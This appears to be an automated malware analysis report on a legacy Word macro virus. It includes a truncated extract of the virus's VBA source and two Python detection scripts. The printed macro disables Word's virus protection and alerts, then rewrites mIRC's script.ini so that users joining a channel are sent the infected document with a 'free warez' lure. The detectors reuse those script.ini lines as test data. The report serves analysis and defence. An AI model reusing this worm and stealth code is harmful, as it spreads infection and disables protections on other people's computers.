Risk Score: 220 (MALICIOUS)
Malware Insights
MITRE ATT&CK: T1059.005 (Command and Scripting Interpreter: Visual Basic)
The sample is a Word macro virus written in the style of the legacy WordBasic viruses: it carries the auto-execution and WordBasic markers flagged by the heuristics ('AutoOpen', 'AutoExec', 'ToolsMacro'), and its comment text jokingly attributes the code to Bill Gates and claims responsibility for the Melissa virus. The SetMeUp routine locates an installed mIRC client (first a path cached in c:\go.sex, then c:\mirc\mirc32.exe, then an Application.FileSearch over c:\), saves the infected document into the mIRC directory as giveme.doc in template format, and overwrites mIRC's script.ini with an on-JOIN handler that messages every user who joins a channel and DCC-sends them giveme.doc. The HideMe routine disables Word's macro virus protection, alerts, save prompts and the Cancel key, and clears the read-only attribute on the Normal template and on the files it writes. The code is not obfuscated, but the preview is truncated, so the body of AutoOpen and anything after it are not visible; the visible intent is worm propagation over IRC.
Heuristics (4)
- ClamAV: Doc.Trojan.Giveme-1 [critical, CLAMAV_DETECTION]: ClamAV detected this file as malware: Doc.Trojan.Giveme-1
- Legacy WordBasic macro-virus markers [high, OLE_LEGACY_WORDBASIC_MACRO_VIRUS]: the OLE Word document contains legacy WordBasic auto-execution macro markers such as AutoOpen together with ToolsMacro/MacroFile/fileMacro/globMacro, or strings naming known historical macro viruses. These old Word 6/95 macro forms are not stored as a modern VBA project, so normal VBA source extraction can miss them.
- VBA macros detected [medium, OLE_VBA_MACROS; 1 related finding]: the document contains VBA macro code
- AutoOpen macro [high, OLE_VBA_AUTOOPEN]: an AutoOpen macro runs automatically when the document is opened
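The legacy-marker heuristic above relies on string scanning rather than VBA project parsing. The following Python is an added illustration of that fallback check, not the analyzer's own code: it searches the raw document bytes for the auto-execution names and the WordBasic macro-copy commands listed in the finding, in both 8-bit and UTF-16LE encodings, and flags only the combination. The byte samples are constructed stand-ins, not real documents.

```python
"""Raw-byte scan for legacy WordBasic auto-macro markers.

Added illustration for the OLE_LEGACY_WORDBASIC_MACRO_VIRUS heuristic; this is
not the analyzer's own code. Word 6/95 WordBasic macros are not stored as a
modern VBA project, so VBA source extraction can miss them. The fallback is to
search the raw file for the auto-execution entry points and the WordBasic
macro-copy commands named in the finding, in 8-bit and UTF-16LE encodings, and
to flag only the combination of the two.
"""
from typing import Dict, List, Tuple

AUTO_MACROS = ("AutoOpen", "AutoClose", "AutoExec", "AutoNew", "AutoExit")
WORDBASIC_MACRO_OPS = ("ToolsMacro", "MacroFile", "fileMacro", "globMacro")


def _byte_forms(name: str) -> Tuple[bytes, bytes]:
    """The marker may be stored as 8-bit text or as UTF-16LE; search both.
    Names are lowercased because VBA/WordBasic identifiers are case-insensitive;
    lowercasing ASCII bytes leaves the UTF-16LE NUL padding untouched."""
    low = name.lower()
    return low.encode("latin-1"), low.encode("utf-16-le")


def find_markers(data: bytes) -> Dict[str, List[str]]:
    """Return which auto-macro names and WordBasic macro operations occur in data."""
    hay = data.lower()
    hits: Dict[str, List[str]] = {"auto": [], "wordbasic": []}
    for key, names in (("auto", AUTO_MACROS), ("wordbasic", WORDBASIC_MACRO_OPS)):
        for name in names:
            if any(form in hay for form in _byte_forms(name)):
                hits[key].append(name)
    return hits


def is_legacy_macro_virus_candidate(data: bytes) -> bool:
    """AutoOpen alone is ordinary in modern VBA documents; the legacy signal is
    an auto-execution name together with a WordBasic macro-copy command."""
    hits = find_markers(data)
    return bool(hits["auto"]) and bool(hits["wordbasic"])


# Constructed stand-ins for raw .doc bytes (not real samples): an OLE
# signature, filler, and the markers in the two encodings.
OLE_MAGIC = b"\xd0\xcf\x11\xe0\xa1\xb1\x1a\xe1"
SAMPLE_LEGACY = (
    OLE_MAGIC + b"\x00" * 16
    + b"AutoOpen" + b"\x00" * 8
    + "ToolsMacro".encode("utf-16-le") + b"\x00" * 8
)
SAMPLE_MODERN_VBA = (
    OLE_MAGIC + b"\x00" * 16
    + b'Attribute VB_Name = "ThisDocument"\r\nSub AutoOpen()\r\nEnd Sub\r\n'
)

if __name__ == "__main__":
    for label, blob in (("legacy", SAMPLE_LEGACY), ("modern", SAMPLE_MODERN_VBA)):
        print(label, find_markers(blob), is_legacy_macro_virus_candidate(blob))
```

Run it against the raw bytes of a suspect .doc (`find_markers(open(path, "rb").read())`); a hit on the combination is a reason to inspect the file with an OLE stream dumper even when olevba reports no VBA project.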
Extracted artifacts (1)
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size | SHA-256 | Detection |
|---|---|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 30199 bytes | b2ddb3b7c1ab81903a32347f6308623a45c59617de11b97493729f127dc42d31 | ClamAV: Doc.Trojan.Giveme-1; obfuscation or payload: unlikely |
Preview script (first 1,000 lines of the extracted script):
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "0{00020906-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "Microsoft"
'Macro virus made by Microsoft Company.
'Author: Bill Gates (yeah, it's really me!).
'
'Bill Gates have to confess:
'"I was the one who did the Melissa virus! I'm sorry for the trouble I may have caused you."
'"The guy David Smith is innocent!"
Sub SetMeUp()
Dim Path As String, D1 As String, D2 As String, D3 As String, _
D4 As String, D5 As String, D6 As String, Docu As String, _
Hell As String
'Stealth
Call HideMe
On Error GoTo Aha
Close #1
'Check if mIRC worm is installed
Open "c:\go.sex" For Input As #1
Input #1, Path
Close #1
If Path = "No fucking mIRC!" Then GoTo WhatTheHell
Open Path & "giveme.doc" For Input As #1
Close #1
Open Path & "script.ini" For Input As #1
Input #1, D1, D2, D3, D4, D5, D6
Close #1
If D1 <> "[script]" Or D2 <> "n0=on 1:JOIN:#:{" Or D3 <> "n1=/msg $nick Hi $nick! Please read the file I'm sending to you. You will get warez" Or D4 <> "mp3 and XXX passwords FOR FREE!" Or D5 <> "n2=/send $nick " & Path & "giveme.doc" Or D6 <> "n3=}" Then GoTo Aha
'MsgBox "mIRC worm already installed.", vbInformation
Exit Sub
Aha:
Resume GoGo
GoGo:
On Error GoTo WhatTheHell
Close #1
StatusBar = "Loading..."
If LCase(Dir("c:\mirc\mirc32.exe")) = "mirc32.exe" Then
Path = "c:\mirc\"
Else
With Application.FileSearch
.NewSearch
.LookIn = "c:\"
.SearchSubFolders = True
.FileName = "mirc32.exe"
.MatchTextExactly = True
.FileType = msoFileTypeAllFiles
.Execute
Hell = 0
'No fucking mIRC!
If .FoundFiles.Count = 0 Then Hell = 1
If Dir(.FoundFiles(1)) = "" Then Hell = 1
If LCase(Right(.FoundFiles(1), 10)) <> "mirc32.exe" Then Hell = 1
If Left(Right(.FoundFiles(1), 11), 1) <> "\" Then Hell = 1
If Hell = 1 Then
'Stupid idiot! Doesn't everyone have mIRC?
Path = "No fucking mIRC!"
GoTo SavePath
Else
'mIRC path
Path = Left(.FoundFiles(1), Len(.FoundFiles(1)) - 10)
End If
End With
End If
Docu = ActiveDocument.FullName
'No fucking write-protect!
If LCase(Dir(Path & "giveme.doc")) = "giveme.doc" Then _
SetAttr Path & "giveme.doc", vbNormal
'Copy infected file to mIRC directory
ActiveDocument.SaveAs Path & "giveme.doc", wdFormatTemplate
'No fucking write-protect!
SetAttr Docu, vbNormal
'Save the document
ActiveDocument.SaveAs Docu, wdFormatTemplate
'Write-protected files sucks so hard!
If LCase(Dir(Path & "script.ini")) = "script.ini" Then _
SetAttr Path & "script.ini", vbNormal
'Create mIRC worm
Open Path & "script.ini" For Output As #1
Print #1, "[script]"
Print #1, "n0=on 1:JOIN:#:{"
Print #1, "n1=/msg $nick Hi $nick! Please read the file I'm sending to you. You will get warez, mp3 and XXX passwords FOR FREE!"
Print #1, "n2=/send $nick " & Path & "giveme.doc"
Print #1, "n3=}"
Close #1
SavePath:
'Yep, I still hate those fucking write-protected files!
If LCase(Dir("c:\go.sex")) = "go.sex" Then _
SetAttr "c:\go.sex", vbNormal
'Save the mIRC path
Open "c:\go.sex" For Output As #1
Print #1, Path
Close #1
Exit Sub
WhatTheHell:
'MsgBox "No mIRC found.", vbInformation
Close #1
Exit Sub
End Sub
Sub HideMe()
On Error Resume Next
'Stealth
Application.EnableCancelKey = wdCancelDisabled
Application.DisplayAlerts = wdAlertsNone
WordBasic.DisableAutoMacros = 0
Options.VirusProtection = False
Options.SaveNormalPrompt = False
Options.SavePropertiesPrompt = False
Options.ConfirmConversions = False
SetAttr NormalTemplate.FullName, vbNormal
End Sub
Sub AutoExec()
'Stealth
Call HideMe
End Sub
Sub AutoOpen()
'Stealth
Call HideMe
'No bugs in Bill's code! No, no...
On Error Resume Next
'Even
... (truncated)
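The propagation step lives in the script.ini the macro writes (the Print #1 lines in SetMeUp): a handler on JOIN that messages the joining user and /send's them giveme.doc. The following Python is an added triage check, not part of the original report or the analyzer: it parses the [script] section of an mIRC script.ini and flags any JOIN handler that DCC-sends a file. The sample text is constructed from the macro's own Print #1 lines, the mIRC directory c:\mirc\ is an assumption (it is the first location the macro checks), and the regexes are this example's own.

```python
r"""Triage check for the mIRC script.ini worm the macro installs.

Added example, not part of the original report. It parses the [script] section
of an mIRC script.ini the way the macro writes it (n0..n3 keys) and flags any
event handler that fires on JOIN and /send's a file to the joining user, which
is the propagation step. The mIRC path c:\mirc\ below is an assumption.
"""
import re
from typing import Dict, List, Optional

# Constructed from the macro's Print #1 statements, with c:\mirc\ as Path.
INFECTED_SCRIPT_INI = (
    "[script]\n"
    "n0=on 1:JOIN:#:{\n"
    "n1=/msg $nick Hi $nick! Please read the file I'm sending to you. "
    "You will get warez, mp3 and XXX passwords FOR FREE!\n"
    "n2=/send $nick c:\\mirc\\giveme.doc\n"
    "n3=}\n"
)

# Constructed benign script for comparison: a TEXT handler, no file transfer.
CLEAN_SCRIPT_INI = "[script]\nn0=on 1:TEXT:hello:#:/msg $chan hi\n"

# "on <level>:<EVENT>:..." opens an mIRC event handler.
EVENT_RE = re.compile(r"^on\s+[^:\s]+:(\w+):", re.IGNORECASE)
# /send (shorthand for /dcc send) transfers a file to $nick by DCC.
SEND_RE = re.compile(r"/(?:dcc\s+)?send\s+\$nick\s+(\S+)", re.IGNORECASE)


def parse_script_section(text: str) -> List[str]:
    """Return the nN= values of the [script] section in numeric key order."""
    entries: Dict[int, str] = {}
    section: Optional[str] = None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith(";"):
            continue
        if line.startswith("[") and line.endswith("]"):
            section = line[1:-1].lower()
            continue
        if section != "script":
            continue
        m = re.match(r"n(\d+)=(.*)", line)
        if m:
            entries[int(m.group(1))] = m.group(2)
    return [entries[k] for k in sorted(entries)]


def find_join_send_handlers(text: str) -> List[Dict[str, str]]:
    """Walk the handlers; inside one that fires on JOIN, record every /send target."""
    findings: List[Dict[str, str]] = []
    event: Optional[str] = None
    braced = False
    for line in parse_script_section(text):
        m = EVENT_RE.match(line)
        if m:
            event = m.group(1).upper()
            braced = line.endswith("{")      # multi-line body follows
        if event == "JOIN":
            s = SEND_RE.search(line)
            if s:
                findings.append({"event": event, "file": s.group(1)})
        if (m and not braced) or line == "}":  # one-line handler or end of body
            event = None
    return findings


def is_giveme_worm(text: str) -> bool:
    """True when a JOIN handler pushes a Word document to joining users,
    the exact pattern the extracted macro writes."""
    return any(f["file"].lower().endswith(".doc")
               for f in find_join_send_handlers(text))


if __name__ == "__main__":
    print(find_join_send_handlers(INFECTED_SCRIPT_INI), is_giveme_worm(INFECTED_SCRIPT_INI))
    print(find_join_send_handlers(CLEAN_SCRIPT_INI), is_giveme_worm(CLEAN_SCRIPT_INI))
```

On a suspected host, run this over the script.ini in the mIRC directory and also check for c:\go.sex and giveme.doc, the two other files the macro leaves behind; the macro's own "already installed" test compares exactly these six script.ini lines, so a host that fails the check here will be reinfected on the next document open.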